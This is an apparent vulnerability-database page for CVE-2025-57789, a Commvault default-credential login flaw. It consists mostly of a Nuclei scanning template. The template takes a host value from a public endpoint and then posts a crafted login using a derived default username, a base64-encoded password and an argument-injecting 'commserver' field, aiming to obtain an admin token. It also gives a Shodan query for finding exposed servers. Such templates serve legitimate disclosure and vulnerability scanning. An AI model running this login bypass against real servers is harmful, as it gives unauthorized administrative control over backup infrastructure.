CVE-2025-57789: Commvault Initial Administrator Login Process Vulnerability

日期: 2025-08-01 | 影响软件: Commvault | POC: 已公开

漏洞描述

An issue was discovered in Commvault before 11.36.60.During the brief window between installation and the first administrator login, remote attackers may exploit the default credential to gain admin control. This is limited to the setup phase, before any jobs have been configured.

PoC代码[已公开]

id: CVE-2025-57789

info:
  name: Commvault Initial Administrator Login Process Vulnerability
  author: DhiyaneshDK,watchtowr
  severity: medium
  description: |
    An issue was discovered in Commvault before 11.36.60.During the brief window between installation and the first administrator login, remote attackers may exploit the default credential to gain admin control. This is limited to the setup phase, before any jobs have been configured.
  reference:
    - https://labs.watchtowr.com/guess-who-would-be-stupid-enough-to-rob-the-same-vault-twice-pre-auth-rce-chains-in-commvault/
    - https://documentation.commvault.com/securityadvisories/CV_2025_08_4.html
    - https://nvd.nist.gov/vuln/detail/CVE-2025-57789
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.favicon.hash:-542502280
  tags: cve,cve2025,commandcenter,commvault,unauth

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/commandcenter/publicLink.do"

    extractors:
      - type: regex
        name: connection
        group: 1
        part: body
        regex:
          - '"activeMQConnectionURL":"tcp:\/\/(.*?):\d+.*"'
        internal: true

  - raw:
      - |
        POST /commandcenter/api/Login HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        Content-Type: application/json;charset=UTF-8

        {
          "username": "{{connection}}_localadmin__",
          "password": "YSAtbG9jYWxhZG1pbg==",
          "commserver": "{{connection}} -cs {{connection}}"
        }

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "userGUID","token")'
        condition: and
# digest: 490a0046304402205142ef9c344ac365cb8cde06a6bf787ca98f8bda8b52c161c45dfedeb1252d380220771d8a75fd2fad22b8aaa1c56dae2ebda4d7ced10e26b7da551b9c7db73e8d3d:922c64590222798bb761d5b6d8e72950

相关漏洞推荐